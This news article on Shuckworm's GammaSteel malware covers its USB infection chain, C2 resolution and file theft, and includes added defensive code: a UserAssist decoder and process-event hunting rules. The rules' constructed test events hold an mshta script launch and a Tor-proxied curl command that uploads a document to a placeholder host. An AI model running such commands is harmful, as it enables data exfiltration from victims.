files.lnk, launched from an external drive. This was recorded under the UserAssist key in the Registry, which stores a record of files, links, applications, and objects accessed by the current user through Windows Explorer.

After that file was executed, it launched mshta.exe, a signed Windows binary (the HTML Application host) that can be used to execute VBScript and JScript locally on Windows. In this case, it was used to execute a JScript (JavaScript) command that invoked an ActiveX object and used wscript.exe to execute a file called ~.drv.

This is a highly obfuscated file whose execution resulted in the creation of two additional files with names of the format NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms, mimicking the legitimate Registry transaction-log files that sit alongside NTUSER.DAT in a user's profile. The goal of one of the files is to contact the attackers' command-and-control (C2) server and maintain a persistent connection with it.

The C2 servers' IP addresses are not embedded in the file. Instead, the file contacts URLs hardcoded in it and retrieves the current addresses from them (a dead-drop resolver), which lets the attackers rotate infrastructure without redeploying the malware. The result is two IP addresses and a domain name that all point to attacker-controlled servers.

“The [C2] server is similar to others that have been used by Shuckworm in the past, as shown in an investigation by Recorded Future where the group leveraged Cloudflare tunnels for their [C2] infrastructure,” the researchers said.

The second file in the attack chain modifies Registry values in order to change how Windows Explorer displays hidden and system files. It then infects any removable drives attached to the computer by copying .lnk files into any directories found on them. This is behavior typical of USB worms.

The file names observed by Symantec were in Ukrainian, but translate to terms such as: “Conduct plan”, “Special message”, “letter to”, “SPECIAL INSPECTION”, “Wound report”, “deployment”, “AIR DEFENSE COMBAT ORDER”, “Commander's decision on defense”, “Obligation”, “Combat calculation”, “GUR support”, “Information on the dead”, “BMP”, “contract extension”, and “Reference about meeting with the source”.

On one machine, the researchers observed the C2 server delivering obfuscated code which was then launched via PowerShell. This started a chain of obfuscated scripts that reached out to more servers and downloaded additional PowerShell scripts.

One script served as a reconnaissance tool, collecting information about the computer, including system information, the names of security software running, available space on disks, the directory tree of the Desktop folder, and a list of all running processes. All of this was sent back to the C2 server.
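The UserAssist key mentioned above is where a forensic examiner would confirm that a shortcut was launched through Explorer. The following is an added example (not code from the article or from Symantec) showing how its entries are decoded: value names are ROT13-encoded, and on Windows 7 and later each 72-byte value carries a run count and a last-execution FILETIME. The subkey GUIDs, the value layout and the ROT13 encoding are documented properties of the artifact; the sample entry (drive letter, file name, count and timestamp) is constructed for the example and is not an indicator from the report.

```python
r"""Decode Windows UserAssist entries (added example; not code from the article or Symantec).

Layout assumed: Windows 7 and later, where value names under
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count
are ROT13-encoded and each value is 72 bytes. The sample entry at the bottom is
constructed for this example and is not an indicator from the report."""
import codecs
import struct
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Optional

# Count subkeys on Windows 7+: one for executables, one for shortcuts (.lnk).
USERASSIST_GUIDS = {
    "{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}": "executable launched via Explorer",
    "{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}": "shortcut (.lnk) launched via Explorer",
}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
VALUE_SIZE = 72
LAST_RUN_OFFSET = 0x3C  # FILETIME of the last execution


@dataclass
class UserAssistEntry:
    category: str
    name: str
    run_count: int
    focus_count: int
    last_run: Optional[datetime]


def decode_userassist_name(encoded: str) -> str:
    """Value names are ROT13-obfuscated; digits, braces and backslashes pass through unchanged."""
    return codecs.decode(encoded, "rot_13")


def filetime_to_datetime(filetime: int) -> Optional[datetime]:
    """FILETIME is 100 ns ticks since 1601-01-01 UTC; zero means 'never recorded'."""
    if filetime == 0:
        return None
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Exact integer conversion (float seconds would lose precision at ~1e17 ticks)."""
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def parse_userassist_value(guid: str, encoded_name: str, data: bytes) -> UserAssistEntry:
    """Parse one Count value. Offsets: 0x00 session id, 0x04 run count, 0x08 focus count,
    0x0C focus time (ms), 0x10 ten floats, 0x38 unknown, 0x3C last-run FILETIME, 0x44 padding."""
    if len(data) != VALUE_SIZE:
        raise ValueError(f"unexpected UserAssist value length {len(data)}, expected {VALUE_SIZE}")
    _session, run_count, focus_count = struct.unpack_from("<III", data, 0)
    (last_run_ft,) = struct.unpack_from("<Q", data, LAST_RUN_OFFSET)
    return UserAssistEntry(
        category=USERASSIST_GUIDS.get(guid.upper(), "unknown UserAssist subkey"),
        name=decode_userassist_name(encoded_name),
        run_count=run_count,
        focus_count=focus_count,
        last_run=filetime_to_datetime(last_run_ft),
    )


def build_sample_value(run_count: int, last_run: datetime) -> bytes:
    """Constructed 72-byte value for the demo, laid out as described in parse_userassist_value."""
    header = struct.pack("<IIIi", 0, run_count, 1, 0)  # session, run count, focus count, focus time
    floats = struct.pack("<10f", *([-1.0] * 10))        # the ten floats, not interpreted here
    tail = struct.pack("<IQI", 0, datetime_to_filetime(last_run), 0)
    return header + floats + tail


def demo() -> UserAssistEntry:
    """Constructed entry: a shortcut on removable drive E:, run three times."""
    guid = "{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}"
    encoded_name = r"R:\ercbeg.yax"  # ROT13 of E:\report.lnk, as it would appear in the hive
    data = build_sample_value(3, datetime(2025, 3, 14, 12, 0, tzinfo=timezone.utc))
    return parse_userassist_value(guid, encoded_name, data)


if __name__ == "__main__":
    entry = demo()
    print(f"{entry.category}: {entry.name} run {entry.run_count}x, last {entry.last_run}")
```

Against a live system or a mounted NTUSER.DAT hive, the same parser is fed each value under the two Count subkeys; a shortcut started from removable media typically appears under the .lnk GUID with the device's drive letter in the decoded name, which is the kind of evidence that ties the infection back to a USB device.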
New GammaSteel variant

The second script was a PowerShell version of GammaSteel that exfiltrated all files with certain extensions from specified directories such as Desktop, Download, and Documents. The targeted extensions included .doc, .docx, .xls, .xlsx, .ppt, .pptx, .vsd, .vsdx, .rtf, .odt, .txt and .pdf.

The new GammaSteel version uses PowerShell web requests to exfiltrate files; if that fails, it falls back to the cURL command-line tool with a Tor proxy to send the data out. There is also code suggesting that the web service write.as was potentially used as a further fallback exfiltration channel.

“This attack does mark something of an increase in sophistication for Shuckworm, which appears to be less skilled than other Russian actors, though it compensates for this with its relentless focus on targets in Ukraine,” the researchers said.

The Symantec report includes indicators of compromise such as file hashes, file names, URLs and IP addresses that security teams can use to build detections or threat-hunting rules.
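Taken together, the chain described above (a .lnk starting mshta.exe with an inline script, mshta.exe spawning wscript.exe against a file whose extension is not a script type, and curl used as a Tor-proxied exfiltration fallback) gives a hunter a few parent-child and command-line shapes to look for. Below is an added example (not from the article or the Symantec report) that applies those rules to constructed process-creation events modelled on Sysmon Event ID 1 fields. The inline javascript: invocation of mshta.exe and a curl SOCKS proxy pointed at Tor's default loopback ports are the common forms of what the article describes, not confirmed specifics of this campaign; all paths, file names and hosts in the events are placeholders.

```python
"""Hunting rules for the execution chain described above (added example; not from the
article or the Symantec report). Events are constructed to resemble Sysmon Event ID 1
fields; every path, file name and host below is a placeholder, not a reported IOC.
Assumptions: mshta.exe was started with an inline 'javascript:' URI (the usual way to
run a one-line JScript command), and curl's Tor fallback used a SOCKS proxy on Tor's
default local ports (9050/9150). Neither detail is confirmed by the article."""
import re
from pathlib import PureWindowsPath
from typing import Callable, Dict, List, Tuple

Event = Dict[str, object]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh"}

INLINE_SCRIPT_RE = re.compile(r"\b(?:javascript|vbscript):", re.I)
# -x / --proxy / --socks5 pointing at Tor's default SOCKS ports on the loopback interface.
TOR_SOCKS_RE = re.compile(
    r"(?:--socks5(?:-hostname)?|-x|--proxy)\s+(?:socks[45]h?://)?(?:127\.0\.0\.1|localhost):(?:9050|9150)\b",
    re.I,
)
# Tokenise a Windows command line: keep double-quoted spans intact, split the rest on whitespace.
TOKEN_RE = re.compile(r'"[^"]*"|\S+')


def image_name(path: object) -> str:
    return PureWindowsPath(str(path)).name.lower()


def script_argument(command_line: str) -> str:
    """First non-option argument to a script host ('//B', '//Nologo' etc. are host options)."""
    tokens = [t.strip('"') for t in TOKEN_RE.findall(command_line)]
    for arg in tokens[1:]:
        if not arg.startswith("/"):
            return arg
    return ""


def mshta_inline_script(e: Event) -> bool:
    return image_name(e["image"]) == "mshta.exe" and bool(INLINE_SCRIPT_RE.search(str(e["command_line"])))


def mshta_spawns_script_host(e: Event) -> bool:
    return image_name(e["parent_image"]) == "mshta.exe" and image_name(e["image"]) in SCRIPT_HOSTS


def script_host_non_script_extension(e: Event) -> bool:
    """wscript/cscript asked to run a file such as '~.drv' whose extension is not a script type."""
    if image_name(e["image"]) not in SCRIPT_HOSTS:
        return False
    target = script_argument(str(e["command_line"]))
    return bool(target) and PureWindowsPath(target).suffix.lower() not in SCRIPT_EXTENSIONS


def curl_via_tor_socks_proxy(e: Event) -> bool:
    return image_name(e["image"]) == "curl.exe" and bool(TOR_SOCKS_RE.search(str(e["command_line"])))


RULES: Dict[str, Callable[[Event], bool]] = {
    "mshta_inline_script": mshta_inline_script,
    "mshta_spawns_script_host": mshta_spawns_script_host,
    "script_host_non_script_extension": script_host_non_script_extension,
    "curl_via_tor_socks_proxy": curl_via_tor_socks_proxy,
}


def find_matches(events: List[Event]) -> List[Tuple[str, int]]:
    """Return (rule name, pid) for every rule that fires on every event."""
    return [(name, int(e["pid"])) for e in events for name, rule in RULES.items() if rule(e)]


# Constructed events (not real telemetry). 1101-1102 mirror the chain in the article, 1104 the
# curl fallback; 1103 is a benign logon script and should not fire anything.
SAMPLE_EVENTS: List[Event] = [
    {"pid": 1101, "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe javascript:var s=new ActiveXObject('WScript.Shell');s.Run('wscript.exe //B %LOCALAPPDATA%\~.drv');close();"},
    {"pid": 1102, "parent_image": r"C:\Windows\System32\mshta.exe", "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'"C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\~.drv"'},
    {"pid": 1103, "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'wscript.exe "C:\Scripts\logon.vbs"'},
    {"pid": 1104, "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "command_line": r'curl.exe -x socks5h://127.0.0.1:9050 -F "file=@C:\Users\user\Documents\plan.docx" https://upload.example.invalid/'},
]

if __name__ == "__main__":
    for name, pid in find_matches(SAMPLE_EVENTS):
        print(f"{name}: pid {pid}")
```

The rules are deliberately structural rather than hash-based: mshta.exe handing off to a script host, a script host being given a file that is not a script, and curl talking to a local SOCKS port survive renamed payloads and rotated C2, whereas the hashes and URLs in the report are what the actor changes first. The same logic ports directly to a Sigma rule or an EDR query once the field names are mapped.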
First seen on csoonline.com
Jump to article: www.csoonline.com/article/3959665/russian-shuckworm-apt-is-back-with-updated-gammasteel-malware.html